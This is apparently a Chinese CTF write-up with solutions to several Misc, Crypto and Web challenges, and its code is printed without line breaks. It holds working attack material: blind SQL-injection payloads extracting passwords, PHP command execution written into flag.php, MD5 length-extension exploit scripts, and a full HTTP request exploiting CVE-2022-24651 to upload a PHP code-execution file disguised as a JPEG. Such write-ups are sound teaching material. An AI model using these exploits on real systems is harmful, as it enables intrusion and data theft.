Misc

1.sqlshark

wireshark导出所有http包为json。然后写个脚本筛选即可。

Python
from json import *r = loads(open("res.json","r",encoding="utf-8").read())res = []for i in range(0,len(r),2):    t = list(r[i]["_source"]["layers"]["urlencoded-form"].keys())[-1]    if "correct" not in list(r[i+1]["_source"]["layers"]["data-text-lines"].keys())[-1]:        if "if(((((ord(substr((select(group_concat(password))from(users)) from" in r[i]["_source"]["layers"]["urlencoded-form"][t]["urlencoded-form.value"].lower():            res.append(r[i]["_source"]["layers"]["urlencoded-form"][t]["urlencoded-form.value"].lower()                        .replace("any'/**/or/**/(if(((((ord(substr((select(group_concat(password))from(users)) from ","")                        .replace("))),1,0))#","").replace(" for 1))))in(",","))for i in res:    i = i.split(",")    print(chr(int(i[-1])),end="")

2.OnlyLocalSql

ssh连上。

Bash
cd /var/www/htmlcat << EOF >> flag.php<?php echo `ls /f*`;EOFcurl http://localhost:80

即可。

也可以加个ssh -L 转发到本地但是没必要()

3.LearnOpenGL

感觉我的是非预期啊

shaders包中,去掉spriteparticle然后打开就能直接看到了()

4.ez_msb

249=>11111001。

数据在第二位放着。主要问题是msb。并不是很想用python写一个实现出来于是直接用了GNU Radio Companion

5.问卷调查

下次还填非常简单。

Crypto

1.SignAhead

md5长度扩展攻击。

hashpump编译不起然后找到了另外一个

Python
from pwn import *import HashToolscontext.log_level = 'info'P = remote("manqiu.top",20924)md5 = HashTools.MD5()for i in range(100):    P.readline()    msg = bytes.fromhex(P.readline().decode().split(":")[1].strip())    print("[*] msg:",msg)    sign =  P.readline().decode().split(":")[1].strip()    print("[*] sign:",sign)    md5 = HashTools.MD5()    P.readline()    nmsg , nsign = md5.extension(32,msg,b"233",signature=sign)    print("[*] nmsg:",nmsg.hex())    print("[*] nsign:",nsign)    P.sendlineafter(b": ",nmsg.hex().encode())    P.sendlineafter(b": ",nsign.encode())    print(P.readline())print(P.recvline())P.close()

2.basiccry

传进去一个超递增/递减序列然后可以直接得到某一行的值。

Python
from pwn import *context.log_level = 'info'P = remote("manqiu.top",21175)r = "".join(str(i)+"," for i in [2**i for i in range(255,-1,-1)]).encode()r = r[:-1]P.sendlineafter(b":",r)cc = []for i in range(256):    l = []    v = (P.recvline().decode().strip('\n')).strip().strip('[]').split(' ')    for _ in v:        if(_=='1' or _=='0'):            l.append(int(_))    cc.append(l)l = []v = (P.recvline().decode().strip('\n')).strip('()').split(',')v = [int(i) for i in v]P.close()l = []r = 2**255d = v[0]r = 2**255ans = ""while r != 0:    if d >= r:        d -= r        ans += "1"    else:        ans += "0"    r //= 2cc = list(cc[0])for i in range(len(cc)):    cc[i] -= int(ans[i])    cc[i] = cc[i] % 2for i in range(0,len(list(cc)),8):    print(chr(int("".join(map(str,list(cc[i:i+8]))),2)),end="")

Web

1.Checkin

直接F12然后在game.js中发现变量_0x3d9d

2.TrySent

CVE-2022-24651

Text
POST /user/upload/upload HTTP/1.1Host: target.comCookie: PHPSESSID=7901b5229557c94bad46e16af23a3728Content-Length: 894Sec-Ch-Ua: " Not;A Brand";v="99", "Google Chrome";v="97", "Chromium";v="97"Sec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThzAccept: */*Origin: https://info.ziwugu.vip/Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://target.com/user/upload/index?name=icon&type=image&limit=1Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,ja-CN;q=0.8,ja;q=0.7,en;q=0.6Connection: close------WebKitFormBoundaryrhx2kYAMYDqoTThzContent-Disposition: form-data; name="id"WU_FILE_0------WebKitFormBoundaryrhx2kYAMYDqoTThzContent-Disposition: form-data; name="name"test.jpg------WebKitFormBoundaryrhx2kYAMYDqoTThzContent-Disposition: form-data; name="type"image/jpeg------WebKitFormBoundaryrhx2kYAMYDqoTThzContent-Disposition: form-data; name="lastModifiedDate"Wed Jul 21 2021 18:15:25 GMT+0800 (中国标准时间)------WebKitFormBoundaryrhx2kYAMYDqoTThzContent-Disposition: form-data; name="size"164264------WebKitFormBoundaryrhx2kYAMYDqoTThzContent-Disposition: form-data; name="file"; filename="test.php"Content-Type: image/jpegJFIF<?php RCE;?>------WebKitFormBoundaryrhx2kYAMYDqoTThz--

3.codefever_again

https://github.com/PGYER/codefever/issues/140